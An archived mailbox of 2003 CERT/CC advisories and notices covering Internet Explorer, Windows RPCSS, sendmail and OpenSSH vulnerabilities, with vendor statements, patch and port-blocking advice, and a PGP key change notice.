http://www.kb.cert.org/vuls/id/265232 c. Multiple Vulnerabilities in Microsoft Internet Explorer Microsoft Internet Explorer (IE) contains multiple vulnerabilities, the most serious of which could allow a remote attacker to execute arbitrary code with the privileges of the user running Internet Explorer. On August 26, the CERT/CC issued an advisory describing these vulnerabilities. CERT Advisory CA-2003-22 Multiple Vulnerabilities in Microsoft Internet Explorer http://www.cert.org/advisories/CA-2003-22.html Vulnerability Note VU#205148 Microsoft Internet Explorer does not properly evaluate Content-Type and Content-Disposition headers http://www.kb.cert.org/vuls/id/205148 Vulnerability Note VU#865940 Microsoft Internet Explorer does not properly evaluate "application/hta" MIME type referenced by DATA attribute of OBJECT element http://www.kb.cert.org/vuls/id/865940 Vulnerability Note VU#548964 Microsoft Windows BR549.DLL ActiveX control contains vulnerability http://www.kb.cert.org/vuls/id/548964 Vulnerability Note VU#813208 Internet Explorer does not properly render an input type tag http://www.kb.cert.org/vuls/id/813208 Vulnerability Note VU#334928 Microsoft Internet Explorer contains buffer overflow in Type attribute of OBJECT element on double-byte character set systems http://www.kb.cert.org/vuls/id/334928 5. Malicious Code Propagation and Antivirus Software Updates Recent reports to the CERT/CC have highlighted that the speed at which viruses are spreading is increasing and that users who were compromised may have been under the incorrect impression that merely having antivirus software installed was enough to protect them from all malicious code attacks. On July 14, the CERT/CC issued an Incident Note describing this trend. CERT Incident Note IN-2003-01 Malicious Code Propagation and Antivirus Software Updates http://www.cert.org/incident_notes/IN-2003-01.html ______________________________________________________________________ New CERT Coordination Center (CERT/CC) PGP Key On September 5, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC. CERT/CC PGP Public Key https://www.cert.org/pgp/cert_pgp_key.asc Sending Sensitive Information to the CERT/CC https://www.cert.org/contact_cert/encryptmail.html ______________________________________________________________________ What's New and Updated Since the last CERT Summary, we have published new and updated * Advisories http://www.cert.org/advisories/ * Vulnerability Notes http://www.kb.cert.org/vuls * CERT/CC Statistics http://www.cert.org/stats/cert_stats.html * Congressional Testimony http://www.cert.org/congressional_testimony * Incident Handling Certification http://www.cert.org/certification/ * Training Schedule http:/www.cert.org/training/ ______________________________________________________________________ This document is available from: http://www.cert.org/summaries/CS-2003-03.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. ______________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright ©2003 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBP1zEHzpmH2w9K/0VAQEqXAP9FHdMZvoEMC4aLxZzP+e52RhSh6p9rzZ2 W+p3aBh6VOsf1mqpDnlJSZy2kydOLzTwklMm4ESxeSER81TfdbKUIgr7pfzNANn8 4DhrXxUZwcc1+5TWY6/LejrrCjZ2OpK9UxkjDSJKMEcrLqIhaEUL3Vr24iTvNliR JKkslK9BDGk= =w9dI -----END PGP SIGNATURE----- From - Wed Sep 10 14:34:18 2003 X-UIDL: 6286 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from uclink-s.berkeley.edu (snarl.Berkeley.EDU [128.32.25.165]) by uclink-store.berkeley.edu (8.12.9/8.12.3) with ESMTP id h8ALVHlo404235; Wed, 10 Sep 2003 14:31:17 -0700 (PDT) Received: from uclink-r.berkeley.edu (localhost.localdomain [127.0.0.1]) by uclink-s.berkeley.edu (8.12.9/8.12.9) with ESMTP id h8ALVC8D002552; Wed, 10 Sep 2003 14:31:12 -0700 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink-r.berkeley.edu (8.12.9/8.12.9) with ESMTP id h8ALV50u002388; Wed, 10 Sep 2003 14:31:06 -0700 Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.29) with ESMTP id h8ALSOFH017714; Wed, 10 Sep 2003 17:28:53 -0400 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h8AKrKMW016421; Wed, 10 Sep 2003 16:53:20 -0400 Date: Wed, 10 Sep 2003 16:53:20 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-23 RPCSS Vulnerabilities in Microsoft Windows Precedence: list Status: RO X-Status: X-Keywords: X-UID: 89 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-23 RPCSS Vulnerabilities in Microsoft Windows Original release date: September 10, 2003 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Microsoft Windows NT Workstation 4.0 * Microsoft Windows NT Server 4.0 * Microsoft Windows NT Server 4.0, Terminal Server Edition * Microsoft Windows 2000 * Microsoft Windows XP * Microsoft Windows Server 2003 Overview Microsoft has published a bulletin describing three vulnerabilities that affect numerous versions of Microsoft Windows. Two of these vulnerabilities are remotely exploitable buffer overflows that may allow an attacker to execute arbitrary code with system privileges. The third vulnerability may allow a remote attacker to cause a denial of service. I. Description The Microsoft RPCSS Service is responsible for managing Remote Procedure Call (RPC) messages. There are two buffer overflow vulnerabilities in the RPCSS service, which is enabled by default on many versions of Microsoft Windows. These buffer overflows occur in sections of code that handle DCOM activation messages sent to the RPCSS service. The CERT/CC is tracking these vulnerabilities as VU#483492 and VU#254236, which correspond to CVE candidates CAN-2003-0715 and CAN-2003-0528, respectively. The buffer overflows discussed in this advisory are different than those discussed in previous advisories. Microsoft has also published information regarding a denial-of-service vulnerability in the RPCSS service. This vulnerability only affects Microsoft Windows 2000 systems. The CERT/CC is tracking this vulnerability as VU#326746, which corresponds to CVE candidate CAN-2003-0605. This vulnerability was previously discussed in CA-2003-19. II. Impact By exploiting either of the buffer overflow vulnerabilities, remote attackers may be able to execute arbitrary code with Local System privileges. By exploiting the denial-of-service vulnerability, remote attackers may be able to disrupt the RPCSS service. This may result in general system instability and require a reboot. III. Solution Apply a patch from Microsoft Microsoft has published Microsoft Security Bulletin MS03-039 to address this vulnerability. For more information, please see http://www.microsoft.com/technet/security/bulletin/MS03-039.asp This bulletin supersedes MS03-026. Block traffic to and from common Microsoft RPC ports As an interim measure, users can reduce the chance of successful exploitation by blocking traffic to and from well-known Microsoft RPC ports, including * Port 135 (tcp/udp) * Port 137 (udp) * Port 138 (udp) * Port 139 (tcp) * Port 445 (tcp/udp) * Port 593 (tcp) To prevent compromised hosts from contacting other vulnerable hosts, the CERT/CC recommends that system administrators filter the ports listed above for both incoming and outgoing traffic. Disable COM Internet Services and RPC over HTTP COM Internet Services (CIS) is an optional component that allows RPC messages to be tunneled over HTTP ports 80 and 443. As an interim measure, sites that use CIS may wish to disable it as an alternative to blocking traffic to and from ports 80 and 443. Disable DCOM Disable DCOM as described in MS03-039 and Microsoft Knowledge Base Article 825750. _________________________________________________________________ This document was written by Jeffrey P. Lanza and is based upon the information in MS03-039. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2003-23.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. ______________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History Sep 10, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBP1+NqTpmH2w9K/0VAQHUbwP/aQ8osvAzy2BswiPOpLFoUhC4GIjdtXcx mGcVDXyVcu4v4pKym8+ojIrQhdWKwOt9ZL8+RSaq8IMjUgE11BX5zA1/1WZhkE7p hlu+HDTkDc5WvFrNqbChrC3gX2fgjI9hjx361SXuhgXAxI5nLz2of50pb+GxPWvA ZQJp4ymyuyI= =A+8F -----END PGP SIGNATURE----- From - Thu Sep 18 09:16:35 2003 X-UIDL: 6532 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from uclink-r.berkeley.edu (rend.Berkeley.EDU [128.32.25.164]) by uclink-store.berkeley.edu (8.12.9-20030924/8.12.3) with ESMTP id h8IG9CgL063816; Thu, 18 Sep 2003 09:09:12 -0700 (PDT) Received: from uclink-r.berkeley.edu (localhost.localdomain [127.0.0.1]) by uclink-r.berkeley.edu (8.12.10/8.12.9) with ESMTP id h8IG94W1004787; Thu, 18 Sep 2003 09:09:04 -0700 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink-r.berkeley.edu (8.12.10/8.12.9) with ESMTP id h8IG8vWp004645; Thu, 18 Sep 2003 09:08:58 -0700 Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.29) with ESMTP id h8IG0sVT020082; Thu, 18 Sep 2003 12:01:06 -0400 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h8IEdCsx015897; Thu, 18 Sep 2003 10:39:13 -0400 Date: Thu, 18 Sep 2003 10:39:13 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-25 Buffer Overflow in Sendmail Precedence: list Status: RO X-Status: X-Keywords: X-UID: 90 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-25 Buffer Overflow in Sendmail Original issue date: September 18, 2003 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Systems running open-source sendmail versions prior to 8.12.10, including UNIX and Linux systems * Commercial releases of sendmail including Sendmail Switch, Sendmail Advanced Message Server (SAMS), and Sendmail for NT Overview A vulnerability in sendmail could allow a remote attacker to execute arbitrary code with the privileges of the sendmail daemon, typically root. I. Description Sendmail is a widely deployed mail transfer agent (MTA). Many UNIX and Linux systems provide a sendmail implementation that is enabled and running by default. Sendmail contains a vulnerability in its address parsing code. An error in the prescan() function could allow an attacker to write past the end of a buffer, corrupting memory structures. Depending on platform and operating system architecture, the attacker may be able to execute arbitrary code with a specially crafted email message. This vulnerability is different than the one described in CA-2003-12. The email attack vector is message-oriented as opposed to connection-oriented. This means that the vulnerability is triggered by the contents of a specially crafted email message rather than by lower-level network traffic. This is important because an MTA that does not contain the vulnerability may pass the malicious message along to other MTAs that may be protected at the network level. In other words, vulnerable sendmail servers on the interior of a network are still at risk, even if the site's border MTA uses software other than sendmail. Also, messages capable of exploiting this vulnerability may pass undetected through packet filters or firewalls. Further information is available in VU#784980. Common Vulnerabilities and Exposures (CVE) refers to this issue as CAN-2003-0694. II. Impact Depending on platform and operating system architecture, a remote attacker could execute arbitrary code with the privileges of the sendmail daemon. Unless the RunAsUser option is set, Sendmail typically runs as root. III. Solution Upgrade or apply a patch This vulnerability is resolved in Sendmail 8.12.10. Sendmail has also released a patch that can be applied to Sendmail 8.9.x through 8.12.9. Information about specific vendors is available in Appendix A. and in the Systems Affected section of VU#784980. Sendmail 8.12.10 is designed to correct malformed messages that are transferred by the server. This should help protect other vulnerable sendmail servers. Enable the RunAsUser option While there is no known complete workaround, consider setting the RunAsUser option to reduce the impact of this vulnerability. It is typically considered to be a good security practice to limit the privileges of applications and services whenever possible. Appendix A. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated, and the changes are noted in the revision history. If a vendor is not listed below, we have not received their direct statement. Further vendor information is available in the Systems Affected section of VU#784980. Debian The sendmail and sendmail-wide packages are vulnerable to this issue. Updated packages are being prepared and will be available soon. F5 Networks BIG-IP and 3-DNS products are not vulnerable. IBM The AIX Security Team is aware of the issues discussed in CERT Vulnerability Note VU#784980. The following APARs will be released to address this issue: APAR number for AIX 4.3.3: IY48659 (available approx. 10/03/03) APAR number for AIX 5.1.0: IY48658 (available approx. 10/15/03) APAR number for AIX 5.2.0: IY48657 (available approx. 10/29/03) An e-fix will be available shortly. The e-fix will be available from: ftp://ftp.software.ibm.com/aix/efixes/security/sendmail_4_efix.tar.Z This vendor statement will be updated when the e-fix becomes available. Lotus This is a sendmail-specific issue that does not affect any Lotus products. Network Appliance NetApp products are not vulnerable to this problem. NetBSD NetBSD-current ships with sendmail 8.12.9 since June 1, 2003. The patch was applied on September 17, 2003. In the near future we would upgrade to sendmail 8.12.10. Our official releases, such as NetBSD 1.6.1, are also affected (they ship with older version of sendmail). They will be patched as soon as possible. We would issue NetBSD Security Advisory on this matter. Openwall GNU/*/Linux Openwall GNU/*/Linux is not vulnerable. We ship Postfix, not Sendmail. Red Hat Red Hat Linux and Red Hat Enterprise Linux ship with a Sendmail package vulnerable to these issues. Updated Sendmail packages are available along with our advisory at the URLs below. Users of the Red Hat Network can update their systems using the 'up2date' tool. Red Hat Linux: http://rhn.redhat.com/errata/RHSA-2003-283.html Red Hat Enterprise Linux: http://rhn.redhat.com/errata/RHSA-2003-284.html The Sendmail Consortium The Sendmail Consortium recommends that sites upgrade to 8.12.10 whenever possible. Alternatively, patches are available for 8.9, 8.10, 8.11, and 8.12 on http://www.sendmail.org/. Sendmail Inc. All commercial releases including Sendmail Switch, Sendmail Advanced Message Server (which includes the Sendmail Switch MTA), Sendmail for NT, and Sendmail Pro are affected by this issue. Patch information is available at http://www.sendmail.com/security/. Sun Sun acknowledges that our recent release of sendmail 8.12.10 is affected by this issue on Solaris releases S7, S8 and S9. A Sun Alert for this issue will be isuued very soon which will then be available from: http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert/56860 There are no patches available at this time. The Sun Alert will be updated with the patch information as it becomes available. Please refer to the Sun Alert when available, for more information. SuSE SuSE products shipping sendmail are affected. Update packages that fix the vulnerability are being prepared and will be published shortly. Appendix B. References * CERT/CC Vulnerability Note VU#784980 - * Michal Zalewski's post to BugTraq - * Sendmail 8.12.10 - * Sendmail patch for 8.12.9 - * Sendmail 8.12.10 announcement - * Sendmail Secure Install - _________________________________________________________________ This vulnerability was discovered by Michal Zalewski. Thanks to Claus Assmann and Eric Allman of Sendmail for their help in preparing this document. _________________________________________________________________ Feedback can be directed to the author, Art Manion. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2003-25.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. ______________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History September 18, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBP2nC8jpmH2w9K/0VAQFKwwP/Vagji3+avI6eb/5C++JCjjmL0Y+JrFmD 6DWgYsOVASDUO4bUyHYiAl2BM8s3owsprTRuKFl3WOf18h++qtTOOO1oeRt+bhqP 1q6ImxjAem7kM2f5e3xdArowptIlqMXFakQ2N3gHqyfXEcmgESrFcGNS8oCV20Y4 rriFRV/lvDU= =/mMy -----END PGP SIGNATURE----- From - Mon Sep 29 16:12:21 2003 X-UIDL: 6785 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from uclink-s.berkeley.edu (snarl.Berkeley.EDU [128.32.25.165]) by uclink-store.berkeley.edu (8.12.9-20030924/8.12.3) with ESMTP id h8TMnUrH180515; Mon, 29 Sep 2003 15:49:30 -0700 (PDT) Received: from uclink-s.berkeley.edu (localhost.localdomain [127.0.0.1]) by uclink-s.berkeley.edu (8.12.10/8.12.9) with ESMTP id h8TMnPHL017084; Mon, 29 Sep 2003 15:49:25 -0700 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink-s.berkeley.edu (8.12.10/8.12.9) with ESMTP id h8TMnGjC016783; Mon, 29 Sep 2003 15:49:17 -0700 Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.29) with ESMTP id h8TMmnCv018645; Mon, 29 Sep 2003 18:48:56 -0400 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h8TMQC6S017981; Mon, 29 Sep 2003 18:26:12 -0400 Date: Mon, 29 Sep 2003 18:26:12 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory Notice: Clarifications regarding recent vulnerabilities in OpenSSH Precedence: list Status: RO X-Status: X-Keywords: X-UID: 92 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory Notice: Clarifications regarding recent vulnerabilities in OpenSSH The CERT/CC has received queries regarding several recent OpenSSH vulnerabilities. We are sending this message to help ensure that administrators have not overlooked one or more of these vulnerabilities. There have been several recent vulnerabilities affecting OpenSSH. They are VU#333628 - OpenSSH contains buffer management errors http://www.kb.cert.org/vuls/id/333628 This issue addresses two releases of OpenSSH to resolve multiple issues in the buffer management code. It is unclear if these issues are exploitable, but they are resolved in version 3.7.1. Note that there are other additional flaws in the buffer management code as reported by Openwall GNU/*/Linux in http://www.kb.cert.org/vuls/id/JARL-5RFQQZ. These four additional flaws are believed to be relatively minor, and are scheduled to be included in the next version of OpenSSH. VU#602204 - OpenSSH PAM challenge authentication failure http://www.kb.cert.org/vuls/id/602204 Under non-standard configurations, portable versions of OpenSSH 3.7p1 and 3.7.1p1 are vulnerable to a remotely exploitable vulnerability. Exploitation of this vulnerability may lead to a remote attacker gaining privileged access to the server, in some cases root access. VU#209807 - Portable OpenSSH server PAM conversion stack corruption http://www.kb.cert.org/vuls/id/209807 There is a vulnerability in portable versions of OpenSSH 3.7p1 and 3.7.1p1 that may permit an attacker to corrupt the PAM conversion stack. The complete impact of this vulnerability is unclear, but may lead to privilege escalation, or a denial of service. Please check the vulnerability notes for resolutions and additional details. Thank you. CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. ______________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBP3iscTpmH2w9K/0VAQGdvAQAjGEyhiCUgXTW/M/JoyKi7TZQG+4D8CJ7 S4+YwWzc8QFYn2c0kXcFd2vc2zHfPO4wGdiL5Tp5Uc7CuOxULVcJSJGbukVcExmg QK3y8ERpSW6V7FyVvCeagrp65Ag20WjvN6ArYeUgyi3sTXKCB8BmFgVvj1cMsivk l8GJsMZNiow= =dOIO -----END PGP SIGNATURE----- From - Wed Oct 15 13:58:07 2003 X-UIDL: 7212 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from uclink-r.berkeley.edu (rend.Berkeley.EDU [128.32.25.164]) by uclink-store.berkeley.edu (8.12.9-20030924/8.12.3) with ESMTP id h9FKSJOh459402; Wed, 15 Oct 2003 13:28:19 -0700 (PDT) Received: from uclink-r.berkeley.edu (localhost.localdomain [127.0.0.1]) by uclink-r.berkeley.edu (8.12.10/8.12.9) with ESMTP id h9FKSCW1019957; Wed, 15 Oct 2003 13:28:12 -0700 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink-r.berkeley.edu (8.12.10/8.12.9) with ESMTP id h9FKS5Wp019749; Wed, 15 Oct 2003 13:28:06 -0700 Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.29) with ESMTP id h9FKM24Q000511; Wed, 15 Oct 2003 16:22:13 -0400 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h9FIqhjg028982; Wed, 15 Oct 2003 14:52:43 -0400 Date: Wed, 15 Oct 2003 14:52:43 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: New CERT Coordination Center (CERT/CC) PGP Key Precedence: list Status: RO X-Status: X-Keywords: X-UID: 93 -----BEGIN PGP SIGNED MESSAGE----- New CERT Coordination Center (CERT/CC) PGP Key The CERT/CC has generated a new PGP key. We use this key to sign all outgoing email, including documents sent to this list. Effective immediately, this new key is available and will be valid until Monday, November 1, 2004. To obtain further information or to download the new CERT/CC public PGP key, please visit or A copy of the new key has also been included at the bottom of this message and sent to public PGP key servers. The passphrase used to protect the previous CERT/CC PGP key was accidentally exposed to a small number of non-CERT/CC personnel with whom we have a close working relationship. We have no reason to believe the encrypted form of the private key was exposed in any way, but in accordance with good key management practices, we have generated a revocation certificate for the previous PGP key. The revocation certificate for PGP key id 0x3D2BFD15 has also been included below and sent to the public PGP key servers. If you have any questions or comments regarding this information, please contact our hotline at +1 412-268-7090 or email us at cert@cert.org. ______________________________________________________________________ This document is available from: or ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. ______________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBP42PoJZ2NNT/dVAVAQGM6AP/Si0zjWCXRqrqVYnIGbOF7VG+9Ae+KjvJ oo3IC2Arm8P4Ztw8vNwLQtE7w9FgYNWfPziGbx5pSwSEA2htPqHfX+oRY9vgg8Hx ihqwqobfI2g5K3loGkQsCvU4+JNCvuF0y/c8/YDodI3DrvHC0BEzYfnbY+11Z5Cq kVc1Sou8Eu4= =kjeV -----END PGP SIGNATURE----- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org mQCNAz9ODi8BrwEEAK7Aozq131hsRQJ1HUmGIhOMnAdJtnVb7o5zrtv25ZJ3O0iD kaSuqx9JSTJXVkuJoNZF4nVbmfk1gw0GBD2yBPYbVAQKlOq0W/zEEXa6R/cGTgWK MBrOz0bnXC3Ed1/aMR/Rg/0n/H8DVrhe0ybw6vssQgcXBM+kJDpmH2w9K/0VAAUR iQCVAwUgP05dyTpmH2w9K/0VAQE2GgP+K+OXttj6D0N9MydzZI4bHxMTwb1t0EkX mlaIVv435ibthRDtghOw6VV/zq51YAtAhJdxjqftQatq42ohLrBygrIUXqftJlMP X46fNbqAL2up5LNti6uNEMvTKw/G82FjVkQPo5S9ZYYikzw7BcNsMpneCEal1MBK TAgVsKwd6Tu0KENFUlQgQ29vcmRpbmF0aW9uIENlbnRlciA8Y2VydEBjZXJ0Lm9y Zz6JAJUDBRA/Tg4vOmYfbD0r/RUBAd/XA/9USS5+CV5em4ooQpOcEw7d/3MqmVRj 7UnibXhJK1T7Hf1ttEQUiiDuC1Awmu7w9hTD4A+4fSbKulvrLrLr2M1KiT9bVWt5 90RptGmgnLPuhjgusEJNdF9lp9c9xVn69BqfIxvHcHtnW5FO4E4or+p/ASJGqGUI vFEExAI6ZvvDIJkAjQM/jKH+AYABBAC9NCzLIR4o5hjIggPpu9VY83d5HYqUR10c uz6ZrykGybhyuVFl2dDyNVtKfX/lDbqzBM2EomgBmmohgrxSbhzyNFULWGoHXgG7 H65OJ+Et9DVgYY4VskCHJ1exMS2aQPkji56VOt6AOy1L8v3PmVsZ/W2Xl75IwA+W djTU/3VQFQAFEbQoQ0VSVCBDb29yZGluYXRpb24gQ2VudGVyIDxjZXJ0QGNlcnQu b3JnPokAlQMFED+Mof6WdjTU/3VQFQEB5j8D/R6otQdfaMuVmcnj88IElauyFi7N v34MdqqEHP9q/SH5FfBQBAw63zixPpWd/zG7TcnwIswvf3HhA9o8rCgW6aGaWVWo NTkwL90JaMWEZxtT+JLP1qQ1TMb/PSndFIyAQH6b0x4uKtI8PASsOczo0TLHlODh KTJ6Jyz9HUuzc6X4iEYEEBECAAYFAj+NS0wACgkQXYr3tqcKhGMLBQCgv6+7Q/9o 18vixI92Jkm298yZEVcAoKjPdBVmrM6T6CzvoHW9DO73EErsiEYEEBECAAYFAj+N S18ACgkQHWlMw1Rb3MQVgwCgzJldauEoDW1DvZqrYdwdyFcsPlwAnRm4zB5/NSnk UJQFBqXYs2f1P6PEiEwEExECAAwFAj+NT3wFgwH5koIACgkQSQjoesB49NKWwQCd 